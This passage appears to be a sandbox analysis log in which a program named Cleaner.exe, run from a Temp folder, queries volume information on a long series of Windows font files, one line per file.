Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
